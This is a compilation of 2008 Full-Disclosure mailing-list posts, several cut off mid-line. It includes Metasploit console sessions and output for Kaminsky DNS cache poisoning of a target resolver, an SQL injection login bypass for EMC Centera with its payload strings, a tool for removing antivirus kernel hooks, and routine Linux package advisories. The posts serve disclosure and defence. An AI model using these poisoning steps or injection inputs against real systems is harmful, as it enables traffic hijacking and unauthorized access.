[Full-disclosure] CAU-EX-2008-0003: Kaminsky DNS Cache Poisoning Flaw Exploit for Domains
____
/\/\ | | | |
/ /\__\##/ /\ \##| |##| |
| | | |__| | | | | |
| | ___ | __ | | | | |
--==##\ \/ /#| |##| |#| |##| |##==--
\/ |__| |__| \__/
Computer Academic Underground
http://www.caughq.org
Exploit Code
===/
Exploit ID: CAU-EX-2008-0003
Release Date: 2008.07.23
Title: bailiwicked_domain.rb
Description:Kaminsky DNS Cache Poisoning Flaw Exploit for Domains
Tested: BIND 9.4.1-9.4.2
Attributes: Remote, Poison, Resolver, Metasploit
Exploit URL:http://www.caughq.org/exploits/CAU-EX-2008-0003.txt
Author/Email: I)ruid
H D Moore
===/
Description
===
This exploit targets a fairly ubiquitous flaw in DNS implementations
which allow the insertion of malicious DNS records into the cache of the
target nameserver. This exploit caches a single malicious nameserver
entry into the target nameserver which replaces the legitimate
nameservers for the target domain. By causing the target nameserver to
query for random hostnames at the target domain, the attacker can spoof
a response to the target server including an answer for the query, an
authority server record, and an additional record for that server,
causing target nameserver to insert the additional record into the
cache. This insertion completely replaces the original nameserver
records for the target domain.
Example
===
# /msf3/msfconsole
## ### ####
## ## ## # #####
### ## ## ## ## ## ## #### ## ## ### ##
### ## ## # ## #### ## ## ####
## # ## ## ## ## ## ## ### ## ## ####
## ## ### # # ## ###
##
=[ msf v3.2-release
+ -- --=[ 298 exploits - 124 payloads
+ -- --=[ 18 encoders - 6 nops
=[ 73 aux
msf > use auxiliary/spoof/dns/bailiwicked_domain
msf auxiliary(bailiwicked_domain) > set RHOST A.B.C.D
RHOST => A.B.C.D
msf auxiliary(bailiwicked_domain) > set DOMAIN example.com
DOMAIN => example.com
msf auxiliary(bailiwicked_domain) > set NEWDNS dns01.metasploit.com
NEWDNS => dns01.metasploit.com
msf auxiliary(bailiwicked_domain) > set SRCPORT 0
SRCPORT => 0
msf auxiliary(bailiwicked_domain) > check
[*] Using the Metasploit service to verify exploitability...
[*] >> ADDRESS: A.B.C.D PORT: 50391
[*] >> ADDRESS: A.B.C.D PORT: 50391
[*] >> ADDRESS: A.B.C.D PORT: 50391
[*] >> ADDRESS: A.B.C.D PORT: 50391
[*] >> ADDRESS: A.B.C.D PORT: 50391
[*] FAIL: This server uses static source ports and is vulnerable to poisoning
msf auxiliary(bailiwicked_domain) > dig +short -t ns example.com @A.B.C.D
[*] exec: dig +short -t ns example.com @A.B.C.D
b.iana-servers.net.
a.iana-servers.net.
msf auxiliary(bailiwicked_domain) > run
[*] Switching to target port 50391 based on Metasploit service
[*] Targeting nameserver A.B.C.D for injection of example.com. nameservers as
dns01.metasploit.com
[*] Querying recon nameserver for example.com.'s nameservers...
[*] Got an NS record: example.com.171957 IN NS
b.iana-servers.net.
[*] Querying recon nameserver for address of b.iana-servers.net
[*]Got an A record: b.iana-servers.net. 171028 IN A
193.0.0.236
[*] Checking Authoritativeness: Querying 193.0.0.236 for example.com
[*] b.iana-servers.net. is authoritative for example.com., adding to list
of nameservers to spoof as
[*] Got an NS record: example.com.171957 IN NS
a.iana-servers.net.
[*] Querying recon nameserver for address of a.iana-servers.net
[*]Got an A record: a.iana-servers.net. 171414 IN A
192.0.34.43
[*] Checking Authoritativeness: Querying 192.0.34.43 for example.com
[*] a.iana-servers.net. is authoritative for example.com., adding to list
of nameservers to spoof as
[*] Attempting to inject poison records for example.com.'s nameservers into
A.B.C.D:50391...
[*] Sent 1000 queries and 2 spoofed responses...
[*] Sent 2000 queries and 4 spoofed responses...
[*] Sent 3000 queries and 6 spoofed responses...
[*] Sent 4000 queries and 8 spoofed responses...
[*] Sent 5000 queries and 10 spoofed responses...
[*] Sent 6000 queries and 12 spoofed responses...
[*] Sent 7000 queries and 14 spoofed responses...
[*] Sent 8000 queries and 16 spoofed responses...
[*] Sent 9
[Full-disclosure] CAU-EX-2008-0002: Kaminsky DNS Cache Poisoning Flaw Exploit
____
/\/\ | | | |
/ /\__\##/ /\ \##| |##| |
| | | |__| | | | | |
| | ___ | __ | | | | |
--==##\ \/ /#| |##| |#| |##| |##==--
\/ |__| |__| \__/
Computer Academic Underground
http://www.caughq.org
Exploit Code
===/
Exploit ID: CAU-EX-2008-0002
Release Date: 2008.07.23
Title: bailiwicked_host.rb
Description:Kaminsky DNS Cache Poisoning Flaw Exploit
Tested: BIND 9.4.1-9.4.2
Attributes: Remote, Poison, Resolver, Metasploit
Exploit URL:http://www.caughq.org/exploits/CAU-EX-2008-0002.txt
Author/Email: I)ruid
H D Moore
===/
Description
===
This exploit targets a fairly ubiquitous flaw in DNS implementations
which allow the insertion of malicious DNS records into the cache of the
target nameserver. This exploit caches a single malicious host entry
into the target nameserver. By causing the target nameserver to query
for random hostnames at the target domain, the attacker can spoof a
response to the target server including an answer for the query, an
authority server record, and an additional record for that server,
causing target nameserver to insert the additional record into the
cache.
Example
===
# /msf3/msfconsole
_ _ _ _
| || | (_) |
_ __ ___ ___| |_ __ _ ___ _ __ | | ___ _| |_
| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __|
| | | | | | __/ || (_| \__ \ |_) | | (_) | | |_
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__|
| |
|_|
=[ msf v3.2-release
+ -- --=[ 298 exploits - 124 payloads
+ -- --=[ 18 encoders - 6 nops
=[ 72 aux
msf > use auxiliary/spoof/dns/bailiwicked_host
msf auxiliary(bailiwicked_host) > show options
Module options:
Name Current SettingRequired Description
--- ---
HOSTNAME pwned.example.com yes Hostname to hijack
NEWADDR 1.3.3.7yes New address for hostname
RECONS208.67.222.222 yes Nameserver used for reconnaissance
RHOSTyes The target address
SRCPORT yes The target server's source query port
(0 for automatic)
XIDS 10 yes Number of XIDs to try for each query
msf auxiliary(bailiwicked_host) > set RHOST A.B.C.D
RHOST => A.B.C.D
msf auxiliary(bailiwicked_host) > check
[*] Using the Metasploit service to verify exploitability...
[*] >> ADDRESS: A.B.C.D PORT: 48178
[*] >> ADDRESS: A.B.C.D PORT: 48178
[*] >> ADDRESS: A.B.C.D PORT: 48178
[*] >> ADDRESS: A.B.C.D PORT: 48178
[*] >> ADDRESS: A.B.C.D PORT: 48178
[*] FAIL: This server uses static source ports and is vulnerable to poisoning
msf auxiliary(bailiwicked_host) > set SRCPORT 0
SRCPORT => 0
msf auxiliary(bailiwicked_host) > run
[*] Switching to target port 48178 based on Metasploit service
[*] Targeting nameserver A.B.C.D
[*] Querying recon nameserver for example.com.'s nameservers...
[*] Got answer with 2 answers, 0 authorities
[*] Got an NS record: example.com.172643 IN NS
ns89.worldnic.com.
[*] Querying recon nameserver for address of ns89.worldnic.com
[*] Got answer with 1 answers, 0 authorities
[*] Got an A record: ns89.worldnic.com. 172794 IN A
205.178.190.45
[*] Checking Authoritativeness: Querying 205.178.190.45 for example.com
[*] ns89.worldnic.com. is authoritative for example.com., adding to list of
nameservers to spoof as
[*] Got an NS record: example.com.172643 IN NS
ns90.worldnic.com.
[*] Querying recon nameserver for address of ns90.worldnic.com
[*] Got answer with 1 answers, 0 authorities
[*] Got an A record: ns90.worldnic.com. 172794 IN A
205.178.144.45
[*] Checking Authoritativeness: Querying 205.178.144.45 for example.com
[*] ns90.worldnic.com. is authoritative for example.com., adding to list of
nameservers to spoof as
[*] Attempting to inject a poison record for pwned.example.com. into
A.B.C.D:48178...
[*] Sent 1000 queries and 2 spoofed responses...
[*] Sent 2000 queries and 4 spoofed responses...
[*] Sent 3000 queries and 6 spoofed responses...
[*] Sent 4000 queries and 8 spoofed responses...
[*] Sent 5000 queries and 10 spoofed responses...
[*] Sent 6000 queries and 12 spoofed responses...
[*] Sent 7000 queries and 14 spoofed responses...
[*] Poiso
[Full-disclosure] [ MDVSA-2008:154 ] - Updated xemacs packages fix vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2008:154 http://www.mandriva.com/security/ ___ Package : xemacs Date: July 23, 2008 Affected: Corporate 3.0 ___ Problem Description: A vulnerability in xemacs was found where an attacker could provide a group of files containing local variable definitions and arbitrary Lisp code to be executed when one of the provided files is opened by xemacs (CVE-2008-2142). The updated packages have been patched to correct this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2142 ___ Updated Packages: Corporate 3.0: e0986da570ec923b469a5f23efdb4538 corporate/3.0/i586/xemacs-21.4.15-5.2.C30mdk.i586.rpm 3beba91071cfd28058b2e99694fc7726 corporate/3.0/i586/xemacs-devel-21.4.15-5.2.C30mdk.i586.rpm 7cb5ac450bf9aeeed94bd138bdc82cdb corporate/3.0/i586/xemacs-el-21.4.15-5.2.C30mdk.i586.rpm a5aedca9c3340a6d354376191303e8e1 corporate/3.0/i586/xemacs-extras-21.4.15-5.2.C30mdk.i586.rpm c33a8054e1f35ad9c36d60c28d2ae0e7 corporate/3.0/i586/xemacs-packages-21.4.15-5.2.C30mdk.i586.rpm a6dad6c62c77c973ecee89e9f9eb7f32 corporate/3.0/SRPMS/xemacs-21.4.15-5.2.C30mdk.src.rpm Corporate 3.0/X86_64: 80e20b9c79f16ed724d83a9b4219408d corporate/3.0/x86_64/xemacs-21.4.15-5.2.C30mdk.x86_64.rpm 5596fce531b255858ce572883ffa5692 corporate/3.0/x86_64/xemacs-devel-21.4.15-5.2.C30mdk.x86_64.rpm f019a4bfb2fee7558ac4edbffa0e5c73 corporate/3.0/x86_64/xemacs-el-21.4.15-5.2.C30mdk.x86_64.rpm 4a863f88ff3c85a1c10aa1a795b2419e corporate/3.0/x86_64/xemacs-extras-21.4.15-5.2.C30mdk.x86_64.rpm 08e1e58a1583ff7298b1eb1001baa751 corporate/3.0/x86_64/xemacs-packages-21.4.15-5.2.C30mdk.x86_64.rpm a6dad6c62c77c973ecee89e9f9eb7f32 corporate/3.0/SRPMS/xemacs-21.4.15-5.2.C30mdk.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFIh5QpmqjQ0CJFipgRAgcGAJ4tCnRP1mjrn13n3WuDE9Dd4uMulACfWj5A I+MUzZJ8MO16rwh3wiuSpGg= =gTyK -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2008:153 ] - Updated emacs packages fix vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2008:153 http://www.mandriva.com/security/ ___ Package : emacs Date: July 23, 2008 Affected: 2007.1, 2008.0, 2008.1, Corporate 3.0, Corporate 4.0 ___ Problem Description: A vulnerability in emacs was found where an attacker could provide a group of files containing local variable definitions and arbitrary Lisp code to be executed when one of the provided files is opened by emacs (CVE-2008-2142). The updated packages have been patched to correct this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2142 ___ Updated Packages: Mandriva Linux 2007.1: d74dae9fd1bd25a85ad129942acedda9 2007.1/i586/emacs-21.4-26.4mdv2007.1.i586.rpm a8722c58647f3459d7fa1091129d36d2 2007.1/i586/emacs-doc-21.4-26.4mdv2007.1.i586.rpm 34887a7e1f7555db0ec555e8fa4fc632 2007.1/i586/emacs-el-21.4-26.4mdv2007.1.i586.rpm e5a9e7e14e0df3d647a5c96bd9372460 2007.1/i586/emacs-leim-21.4-26.4mdv2007.1.i586.rpm 1c9838c3a561ad8813d4b5cee8b82400 2007.1/i586/emacs-nox-21.4-26.4mdv2007.1.i586.rpm b9892f4738715018b2e6df7d02e6687d 2007.1/i586/emacs-X11-21.4-26.4mdv2007.1.i586.rpm af96e6a121eb5f8b8170ff941114c489 2007.1/SRPMS/emacs-21.4-26.4mdv2007.1.src.rpm Mandriva Linux 2007.1/X86_64: 600d616346db08ca13bdf11ddbcef44b 2007.1/x86_64/emacs-21.4-26.4mdv2007.1.x86_64.rpm 928441ff823f240f73538d3158153fbe 2007.1/x86_64/emacs-doc-21.4-26.4mdv2007.1.x86_64.rpm 60e33fa1d0bdf71a779a037c15d1985c 2007.1/x86_64/emacs-el-21.4-26.4mdv2007.1.x86_64.rpm 198718097f7a60bff2a68af82db28a43 2007.1/x86_64/emacs-leim-21.4-26.4mdv2007.1.x86_64.rpm 4299965f8b4b183af31e3f898c81110f 2007.1/x86_64/emacs-nox-21.4-26.4mdv2007.1.x86_64.rpm 5ca6f64f83f530f8b51d271bc8ec726e 2007.1/x86_64/emacs-X11-21.4-26.4mdv2007.1.x86_64.rpm af96e6a121eb5f8b8170ff941114c489 2007.1/SRPMS/emacs-21.4-26.4mdv2007.1.src.rpm Mandriva Linux 2008.0: 024e38f1ec4e6eabae4b274da83dde18 2008.0/i586/emacs-22.1-5.3mdv2008.0.i586.rpm 4214b10282db0615b9b729f187934db1 2008.0/i586/emacs-common-22.1-5.3mdv2008.0.i586.rpm 22ff8c91f547061d333465ded6a2d0da 2008.0/i586/emacs-doc-22.1-5.3mdv2008.0.i586.rpm 304b35b5af43ba47a736d2c0d9a8faa2 2008.0/i586/emacs-el-22.1-5.3mdv2008.0.i586.rpm 97788932323d9f7e2250d30f97ce3f8c 2008.0/i586/emacs-gtk-22.1-5.3mdv2008.0.i586.rpm 2406a6b60ee316bc1c67385b0db82cf8 2008.0/i586/emacs-leim-22.1-5.3mdv2008.0.i586.rpm 12883d439574ef26201af9c504144b9f 2008.0/i586/emacs-nox-22.1-5.3mdv2008.0.i586.rpm d58ad7b06f3f0c0db4fea12e1570 2008.0/SRPMS/emacs-22.1-5.3mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: d57e83291c764980266625bcb889cc87 2008.0/x86_64/emacs-22.1-5.3mdv2008.0.x86_64.rpm 03cef7dd549b3d65e11c8d12875516cf 2008.0/x86_64/emacs-common-22.1-5.3mdv2008.0.x86_64.rpm 94f8e4725a640069161a0f86cee69195 2008.0/x86_64/emacs-doc-22.1-5.3mdv2008.0.x86_64.rpm a1b95c035307112fc7ccbed4ce53975c 2008.0/x86_64/emacs-el-22.1-5.3mdv2008.0.x86_64.rpm f47c2c3bffd8ecaeffec9bb3b19c94e8 2008.0/x86_64/emacs-gtk-22.1-5.3mdv2008.0.x86_64.rpm 118252721969c9ce844cebdcbcd3f8a7 2008.0/x86_64/emacs-leim-22.1-5.3mdv2008.0.x86_64.rpm 6c5622ed590a236cf2576814dd87ec9d 2008.0/x86_64/emacs-nox-22.1-5.3mdv2008.0.x86_64.rpm d58ad7b06f3f0c0db4fea12e1570 2008.0/SRPMS/emacs-22.1-5.3mdv2008.0.src.rpm Mandriva Linux 2008.1: 29455a1008c19f2f0d7d8abb2a653c73 2008.1/i586/emacs-22.1-7.2mdv2008.1.i586.rpm 98a8a2d6fa0aaa7cde7770759012a411 2008.1/i586/emacs-common-22.1-7.2mdv2008.1.i586.rpm 5c08857d28e60a6834bee8e77d6725c3 2008.1/i586/emacs-doc-22.1-7.2mdv2008.1.i586.rpm 50c31d9e899581584a78490b0a27c837 2008.1/i586/emacs-el-22.1-7.2mdv2008.1.i586.rpm ce0ad85bc6539d1303c5658f24417670 2008.1/i586/emacs-gtk-22.1-7.2mdv2008.1.i586.rpm 7f4413c929c28b926c3887985fa3b0a2 2008.1/i586/emacs-leim-22.1-7.2mdv2008.1.i586.rpm 51844adc76e16167fdd4db0d61daffe8 2008.1/i586/emacs-nox-22.1-7.2mdv2008.1.i586.rpm cf941f26a979357e553b0cb973a7c7ab 2008.1/SRPMS/emacs-22.1-7.2mdv2008.1.src.rpm Mandriva Linux 2008.1/X86_64: 6961fbbb8bafde024f192ce2bb536138 2008.1/x86_64/emacs-22.1-7.2mdv2008.1.x86_64.rpm 41f14023d94c42112ac6b9e5063e9fc7 2008.1/x86_64/emacs-common-22.1-7.2mdv2008.1.x86_64.rpm 228d317d952c8ece0c8c64b091717826 2008.1/x86_64/emacs-doc-22.1-7.2mdv2008.1.x86_64.rpm bcb34100a279a0727192cfefa898486f 2008.1/x86_64/emacs-el-22.1-7.2mdv2008.1.x86_64.rpm a7f2b52088198749411707b9fde36f2a 2008.1/x86_64/emacs-gtk-22.1-7.2mdv2008.1.x86_64.rpm bb4f8dafeb0696b7e5c739abdd91a0cf 2008.1/x86_64/emacs-leim-22.1-7.2m
[Full-disclosure] [tool] SDT Cleaner 1.0
Hello! You can find it here: http://oss.coresecurity.com/projects/sdtcleaner.html Package: http://oss.coresecurity.com/repo/SDTCleaner-v1.0.zip What is the SDT Cleaner? SDT Cleaner is a tool that intends to clean the SSDT (system service descriptor table) from hooks. * The SDT Cleaner allows you to clean hooks installed by Anti-Virus and Firewalls. * This little tool (in this first release) tries to collect info from your current kernel and then switches to kernel land and if there are any hooks in SSDT, this tool will replace them with the original entries. Requirements * In this first release, you'll just need Windows XP. * I'm planning to add support for Windows 2000 / 2003. Thanks! Nahuel. Open Source Software Core Security Technologies ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2008:153 ] - Updated emacs packages fix vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2008:153 http://www.mandriva.com/security/ ___ Package : emacs Date: July 23, 2008 Affected: 2007.1, 2008.0, 2008.1, Corporate 3.0, Corporate 4.0 ___ Problem Description: A vulnerability in emacs was found where an attacker could provide a group of files containing local variable definitions and arbitrary Lisp code to be executed when one of the provided files is opened by emacs (CVE-2008-2142). The updated packages have been patched to correct this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2142 ___ Updated Packages: Mandriva Linux 2007.1: d74dae9fd1bd25a85ad129942acedda9 2007.1/i586/emacs-21.4-26.4mdv2007.1.i586.rpm a8722c58647f3459d7fa1091129d36d2 2007.1/i586/emacs-doc-21.4-26.4mdv2007.1.i586.rpm 34887a7e1f7555db0ec555e8fa4fc632 2007.1/i586/emacs-el-21.4-26.4mdv2007.1.i586.rpm e5a9e7e14e0df3d647a5c96bd9372460 2007.1/i586/emacs-leim-21.4-26.4mdv2007.1.i586.rpm 1c9838c3a561ad8813d4b5cee8b82400 2007.1/i586/emacs-nox-21.4-26.4mdv2007.1.i586.rpm b9892f4738715018b2e6df7d02e6687d 2007.1/i586/emacs-X11-21.4-26.4mdv2007.1.i586.rpm af96e6a121eb5f8b8170ff941114c489 2007.1/SRPMS/emacs-21.4-26.4mdv2007.1.src.rpm Mandriva Linux 2007.1/X86_64: 600d616346db08ca13bdf11ddbcef44b 2007.1/x86_64/emacs-21.4-26.4mdv2007.1.x86_64.rpm 928441ff823f240f73538d3158153fbe 2007.1/x86_64/emacs-doc-21.4-26.4mdv2007.1.x86_64.rpm 60e33fa1d0bdf71a779a037c15d1985c 2007.1/x86_64/emacs-el-21.4-26.4mdv2007.1.x86_64.rpm 198718097f7a60bff2a68af82db28a43 2007.1/x86_64/emacs-leim-21.4-26.4mdv2007.1.x86_64.rpm 4299965f8b4b183af31e3f898c81110f 2007.1/x86_64/emacs-nox-21.4-26.4mdv2007.1.x86_64.rpm 5ca6f64f83f530f8b51d271bc8ec726e 2007.1/x86_64/emacs-X11-21.4-26.4mdv2007.1.x86_64.rpm af96e6a121eb5f8b8170ff941114c489 2007.1/SRPMS/emacs-21.4-26.4mdv2007.1.src.rpm Mandriva Linux 2008.0: 024e38f1ec4e6eabae4b274da83dde18 2008.0/i586/emacs-22.1-5.3mdv2008.0.i586.rpm 4214b10282db0615b9b729f187934db1 2008.0/i586/emacs-common-22.1-5.3mdv2008.0.i586.rpm 22ff8c91f547061d333465ded6a2d0da 2008.0/i586/emacs-doc-22.1-5.3mdv2008.0.i586.rpm 304b35b5af43ba47a736d2c0d9a8faa2 2008.0/i586/emacs-el-22.1-5.3mdv2008.0.i586.rpm 97788932323d9f7e2250d30f97ce3f8c 2008.0/i586/emacs-gtk-22.1-5.3mdv2008.0.i586.rpm 2406a6b60ee316bc1c67385b0db82cf8 2008.0/i586/emacs-leim-22.1-5.3mdv2008.0.i586.rpm 12883d439574ef26201af9c504144b9f 2008.0/i586/emacs-nox-22.1-5.3mdv2008.0.i586.rpm d58ad7b06f3f0c0db4fea12e1570 2008.0/SRPMS/emacs-22.1-5.3mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: d57e83291c764980266625bcb889cc87 2008.0/x86_64/emacs-22.1-5.3mdv2008.0.x86_64.rpm 03cef7dd549b3d65e11c8d12875516cf 2008.0/x86_64/emacs-common-22.1-5.3mdv2008.0.x86_64.rpm 94f8e4725a640069161a0f86cee69195 2008.0/x86_64/emacs-doc-22.1-5.3mdv2008.0.x86_64.rpm a1b95c035307112fc7ccbed4ce53975c 2008.0/x86_64/emacs-el-22.1-5.3mdv2008.0.x86_64.rpm f47c2c3bffd8ecaeffec9bb3b19c94e8 2008.0/x86_64/emacs-gtk-22.1-5.3mdv2008.0.x86_64.rpm 118252721969c9ce844cebdcbcd3f8a7 2008.0/x86_64/emacs-leim-22.1-5.3mdv2008.0.x86_64.rpm 6c5622ed590a236cf2576814dd87ec9d 2008.0/x86_64/emacs-nox-22.1-5.3mdv2008.0.x86_64.rpm d58ad7b06f3f0c0db4fea12e1570 2008.0/SRPMS/emacs-22.1-5.3mdv2008.0.src.rpm Mandriva Linux 2008.1: 29455a1008c19f2f0d7d8abb2a653c73 2008.1/i586/emacs-22.1-7.2mdv2008.1.i586.rpm 98a8a2d6fa0aaa7cde7770759012a411 2008.1/i586/emacs-common-22.1-7.2mdv2008.1.i586.rpm 5c08857d28e60a6834bee8e77d6725c3 2008.1/i586/emacs-doc-22.1-7.2mdv2008.1.i586.rpm 50c31d9e899581584a78490b0a27c837 2008.1/i586/emacs-el-22.1-7.2mdv2008.1.i586.rpm ce0ad85bc6539d1303c5658f24417670 2008.1/i586/emacs-gtk-22.1-7.2mdv2008.1.i586.rpm 7f4413c929c28b926c3887985fa3b0a2 2008.1/i586/emacs-leim-22.1-7.2mdv2008.1.i586.rpm 51844adc76e16167fdd4db0d61daffe8 2008.1/i586/emacs-nox-22.1-7.2mdv2008.1.i586.rpm cf941f26a979357e553b0cb973a7c7ab 2008.1/SRPMS/emacs-22.1-7.2mdv2008.1.src.rpm Mandriva Linux 2008.1/X86_64: 6961fbbb8bafde024f192ce2bb536138 2008.1/x86_64/emacs-22.1-7.2mdv2008.1.x86_64.rpm 41f14023d94c42112ac6b9e5063e9fc7 2008.1/x86_64/emacs-common-22.1-7.2mdv2008.1.x86_64.rpm 228d317d952c8ece0c8c64b091717826 2008.1/x86_64/emacs-doc-22.1-7.2mdv2008.1.x86_64.rpm bcb34100a279a0727192cfefa898486f 2008.1/x86_64/emacs-el-22.1-7.2mdv2008.1.x86_64.rpm a7f2b52088198749411707b9fde36f2a 2008.1/x86_64/emacs-gtk-22.1-7.2mdv2008.1.x86_64.rpm bb4f8dafeb0696b7e5c739abdd91a0cf 2008.1/x86_64/emacs-leim-22.1-7.2m
[Full-disclosure] DNS forward only: why does it help?
As a workaround, it is recommended to set DNS servers to forward only. Can someone explain why that helps? Cannot responses from the forwarder be spoofed same as normal query responses? Is it that "glue RRs" from forwarders are discarded; or that source ports of forwarded requests are better randomized than normal queries; or that forwarding is done with TCP not UDP? The "published attack" has ns.victim.com spoofed. That does not affect a server set to forward only. Could the attacker spoof login.victim.com directly, and would not that affect a forward only server equally? Thanks, Paul Szabo [EMAIL PROTECTED] http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of SydneyAustralia ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA 1540-3] New lighttpd packages fix regression
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - Debian Security Advisory DSA-1540-3 [EMAIL PROTECTED] http://www.debian.org/security/ Thijs Kinkhorst July 23, 2008 http://www.debian.org/security/faq - Package: lighttpd Vulnerability : denial of service Problem type : remote Debian-specific: no CVE Id(s) : CVE-2008-1531 This update fixes a regression in lighttpd introduced in DSA-1540, causing SSL failures. For reference the original advisory text is quoted below. It was discovered that lighttpd, a fast webserver with minimal memory footprint, was didn't correctly handle SSL errors. This could allow a remote attacker to disconnect all active SSL connections. For the stable distribution (etch), this problem has been fixed in version 1.4.13-4etch10. We recommend that you upgrade your lighttpd package. Upgrade instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - --- Source archives: http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd_1.4.13-4etch10.diff.gz Size/MD5 checksum:36023 5421eda86388cddf30348ee39c8b2059 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd_1.4.13.orig.tar.gz Size/MD5 checksum: 793309 3a64323b8482b0e8a6246dbfdb4c39dc http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd_1.4.13-4etch10.dsc Size/MD5 checksum: 1392 6011ac4224ab8ff0c1c9355f30ab11a9 Architecture independent packages: http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-doc_1.4.13-4etch10_all.deb Size/MD5 checksum: 100096 416759ae3a223ab799bbc7b264329600 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd_1.4.13-4etch10_alpha.deb Size/MD5 checksum: 319874 0b138412935fb92f57bf968d075a05c1 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-magnet_1.4.13-4etch10_alpha.deb Size/MD5 checksum:64968 5357d1c9aad4f5f5c03016d708670164 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-cml_1.4.13-4etch10_alpha.deb Size/MD5 checksum:65408 03933a616584ab63c0e59e652856b99c http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-mysql-vhost_1.4.13-4etch10_alpha.deb Size/MD5 checksum:60148 8ed6ab0f02706ba339813f160cac356d http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-trigger-b4-dl_1.4.13-4etch10_alpha.deb Size/MD5 checksum:61924 7171b0c3a9542b33a73b38e9b2ac516d http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-webdav_1.4.13-4etch10_alpha.deb Size/MD5 checksum:71890 3d4973ba1c5e8d4938a35f7247e1cdbf amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-webdav_1.4.13-4etch10_amd64.deb Size/MD5 checksum:70182 7ab5aa294cc9a9949ec81c850dddafee http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-trigger-b4-dl_1.4.13-4etch10_amd64.deb Size/MD5 checksum:60978 961bc12a093309e50684188b2e948461 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-cml_1.4.13-4etch10_amd64.deb Size/MD5 checksum:64116 c745249a7e7e42d0abdd3c7761ffb086 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-mysql-vhost_1.4.13-4etch10_amd64.deb Size/MD5 checksum:59368 aceae8b5e32229cf22de3d3b34344ba9 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd_1.4.13-4etch10_amd64.deb Size/MD5 checksum: 297762 f6cf537e673702bc7f801a697368a5bc http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-magnet_1.4.13-4etch10_amd64.deb Size/MD5 checksum:63822 9345b068868eb6209ec440d58ce86c55 arm architecture (ARM) http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd_1.4.13-4etch10_arm.deb Size/MD5 checksum: 286920 d13637f537de06b137194407064ac0a9 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-webdav_1.4.13-4etch10_arm.deb Size/MD5 checksum:69928 a3f8604454dcdd7c7b8ae9f11302e833 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-trigger-b4-dl_1.4.13-4etch10_arm.deb Size/MD5 checksum:61044 773180da5b9fc10d1d9d2dd414249ff5 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-mysql-vhost_1.4.13-4etch10_arm.deb Size/MD5 checksum:
[Full-disclosure] Vulnerability Report: EMC Centera Universal Access
adMERITia Vulnerability Report Vulnerability Information Vendor: EMC² Product: Centera Universal Access Version: CUA4.0_4735.p4 Vulnerability Type: Software Flaw Vulnerability: SQL Injection Impact: Attacker can bypass the authentication method and will be logged in as an arbitrary user. With specific knowledge of user names it is possible for an attacker to choose the user he/she wishes to log in as without a password. Description: The user name field of the CUA Module Login does not sanitize user input allowing for an attacker to run arbitrary SQL code. Through "--" syntax it is possible to comment out the password check allowing an attacker to log in with the first available user name in the table. After performing this several times or by searching through the "Accounts" tab within the CUA Module an attacker can gather a list of all users. With this list an attacker can select an administrator account and log in with this by simply entering the user name followed by "--". How Vulnerability can be reproduced: For an arbitrary account enter the following in the user field: ' -- For a targeted account enter the following in the user field: valid_user_name' -- Release Information Model: CENTERA_GEN_4 Software Version: CUA4.0_4735.p4 Operating System: Linux i386 V. 2.6.16.21-0.15_VCUA4_0_4735 Fix: (quote from the vendor) "The remedy for the reported problems has been 